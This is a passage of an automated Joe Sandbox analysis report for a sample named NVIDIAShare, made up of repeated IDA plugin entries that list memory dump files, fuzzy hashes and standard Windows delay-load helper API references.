                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0825d0a704fd763b3dc4f04e5af1b422bf677ec2c569960e0afc5a6d213a30a0
                                                            • Instruction ID: 9782547166103dc46d1bf7ea15c09e8f14cc583ac68d401e17357ed581be974d
                                                            • Opcode Fuzzy Hash: 0825d0a704fd763b3dc4f04e5af1b422bf677ec2c569960e0afc5a6d213a30a0
                                                            • Instruction Fuzzy Hash: 4FB012F1258101FD30455156DD05CBF115CF6C0E10320412FFCCECC084D8445D8104B1
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8d575f865741a4df0baeb54127af3c04b4c9fb85e371331ec3e64ed30c471e7e
                                                            • Instruction ID: 7355c22bbead29b5bc7e7ce2fceab7e32abb78ff286265dfe9fce92d2ab4fa88
                                                            • Opcode Fuzzy Hash: 8d575f865741a4df0baeb54127af3c04b4c9fb85e371331ec3e64ed30c471e7e
                                                            • Instruction Fuzzy Hash: 89B012F1258001EC30055556DE05CBF115CF6C0E10320402FFCCECC084DC445E420471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 36ffa3ef381845597bff9e9cf7ad8e66aa9dd98071fab1933a1aa2619ef56f98
                                                            • Instruction ID: 5cbcc7a153bbe98248640cd6314caa06239b6ad8fb61148a845c1e3f408d876b
                                                            • Opcode Fuzzy Hash: 36ffa3ef381845597bff9e9cf7ad8e66aa9dd98071fab1933a1aa2619ef56f98
                                                            • Instruction Fuzzy Hash: 28B012F1258001EC30055157DD05CBF115CF6D0E10320402FFCCECC084D8445D410471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7e56146bb6faf583ef3a7f66dc07e24a3c726d7ab3b9c1f2a9557c37eae3da28
                                                            • Instruction ID: b2c40ba8b135e5448102529fdf150c7e7cbd843928fca5f99796b982c1c566cf
                                                            • Opcode Fuzzy Hash: 7e56146bb6faf583ef3a7f66dc07e24a3c726d7ab3b9c1f2a9557c37eae3da28
                                                            • Instruction Fuzzy Hash: 89B012E1259041EC30055156DD05CBF111DF7C1A10320802FFCCECC084D8449C410471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 61786e111ea5a4bfa2e694ba476e684aaeda231b3351de3de1067acd08a26021
                                                            • Instruction ID: 83637c04ff00bce7e9de6fc22033e93fd6ad7be8891bbc49264a001c40495572
                                                            • Opcode Fuzzy Hash: 61786e111ea5a4bfa2e694ba476e684aaeda231b3351de3de1067acd08a26021
                                                            • Instruction Fuzzy Hash: 75B012F1259141FD30455256DD05CBF111DF7C0910320412FFCCECC084D8445C850471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 61a58f0c34e376a829010ba3c9ca1aa0f92c52d297055c9529ce88e773049cfc
                                                            • Instruction ID: e0aeba5ee79d3d2f03f4d34176bdcea84196a858ca29dcb6d883c46ef0b75eff
                                                            • Opcode Fuzzy Hash: 61a58f0c34e376a829010ba3c9ca1aa0f92c52d297055c9529ce88e773049cfc
                                                            • Instruction Fuzzy Hash: 2CB012E1269041EC30055156DD05CBF115DFBC0910320402FFCCFCC084D8445C410471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: dd9d81f14d043ba74f8aae6b16c608f23e1dd455fedda3cf00b38ee2b8a10492
                                                            • Instruction ID: bd6ff8c7039774ba3754c8e646c49a5dd1b1b0c8236d03d57bf20b011aae1a85
                                                            • Opcode Fuzzy Hash: dd9d81f14d043ba74f8aae6b16c608f23e1dd455fedda3cf00b38ee2b8a10492
                                                            • Instruction Fuzzy Hash: C2B012E1258001EC30055166DD05CBF115CF6C1A10320802FFCCECC084D844DD810471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7b8a396523309b72332c461f060e6cff52a9fa719689d5781bd86f313d15e5e9
                                                            • Instruction ID: fd1418eb35aaa4a8b0adb9ea5527ebfd145f80f6751442d17db9b6e78c47552c
                                                            • Opcode Fuzzy Hash: 7b8a396523309b72332c461f060e6cff52a9fa719689d5781bd86f313d15e5e9
                                                            • Instruction Fuzzy Hash: 45B012F1258001EC30055156DE05CBF119CF6C0910320402FFCCECC084DC445E820471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: db5e44095cfca8316b694d9f7613a421d4d3a6b894ce555e59f04ce81bae2a97
                                                            • Instruction ID: 214b5ccabe5881e2da6612996def4f65c0839d7cac0abd53eec8cb7e0c79d2a9
                                                            • Opcode Fuzzy Hash: db5e44095cfca8316b694d9f7613a421d4d3a6b894ce555e59f04ce81bae2a97
                                                            • Instruction Fuzzy Hash: 58B012C125C0017C31051225DD05E3F110CE6C1D10320502FFCD8D8485F8441C090471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 381b0f3a11d8afaeacda62cd2c9cb61de7e628cc1008b2523ab25a5e9c2f912c
                                                            • Instruction ID: f3d5b0f25a2af2807c6a16aad00d8d7c9e2131e2e8a46134415b513eb1768e7a
                                                            • Opcode Fuzzy Hash: 381b0f3a11d8afaeacda62cd2c9cb61de7e628cc1008b2523ab25a5e9c2f912c
                                                            • Instruction Fuzzy Hash: 9CB012C12580417C31055209DE01D3F150CD6C5E10320801FFCCCC8044F8441C060571
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0552bb0130be7ea5cd940134cfc2f664819936d285463b188669d23895cb4607
                                                            • Instruction ID: ec1b446e2256414fec000520a2bc2b00fc8a89acfc9aba3322920b64dc83996c
                                                            • Opcode Fuzzy Hash: 0552bb0130be7ea5cd940134cfc2f664819936d285463b188669d23895cb4607
                                                            • Instruction Fuzzy Hash: 8CB012C125D0017D31055209DD01E3F110CE6C5D10320401FFCCCC8044F8441C050571
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 82533edf324cfe08fe29e97db02929a870f99e8d4127d862012a8e034de04721
                                                            • Instruction ID: 48dddb407f410e23c0741f0acb087f6f38e95b1055f7b4fea63319daf44a5af7
                                                            • Opcode Fuzzy Hash: 82533edf324cfe08fe29e97db02929a870f99e8d4127d862012a8e034de04721
                                                            • Instruction Fuzzy Hash: 56B012C12581017C32055209DD02D3F111CD6C5D10320421FFCCCC8044F8442C490571
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 37958d85ed9fe38fc37bbb065ee2d692b225db84249e03ba4acd200564622c6b
                                                            • Instruction ID: 8fb44fcf3c63c1f910765bc11d4ac108cd0da4938601c6152be65d91e6fe641a
                                                            • Opcode Fuzzy Hash: 37958d85ed9fe38fc37bbb065ee2d692b225db84249e03ba4acd200564622c6b
                                                            • Instruction Fuzzy Hash: CBB012C1659101BD31055155DD01C3F215CE6C4910320401FFCCCCD044F8441C010471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 47f443136a76a2fbc7649aa477e004317d25a9560b6dd0608c4e8a7f0826e34b
                                                            • Instruction ID: c659e16a7fc367c9e1ab855b6dad5d3b15abe5ceffcb597f7a085e14886f150e
                                                            • Opcode Fuzzy Hash: 47f443136a76a2fbc7649aa477e004317d25a9560b6dd0608c4e8a7f0826e34b
                                                            • Instruction Fuzzy Hash: 3AB012C1658101BC31055155DE01C3F617CD6C4910360421FFCCCCD044FC441C020471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 00158a2d95572b6dc4d833d746a05f4ea304060907a2976893a73651031a516d
                                                            • Instruction ID: 651b7f3e287c08ec764456ea97d10fb58c746e8eb7b4601acd59e52f29ff0e58
                                                            • Opcode Fuzzy Hash: 00158a2d95572b6dc4d833d746a05f4ea304060907a2976893a73651031a516d
                                                            • Instruction Fuzzy Hash: F3B012C1658201BD31455155DD02C3F217CD6C4910320421FFCCCCD044F8441C410471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
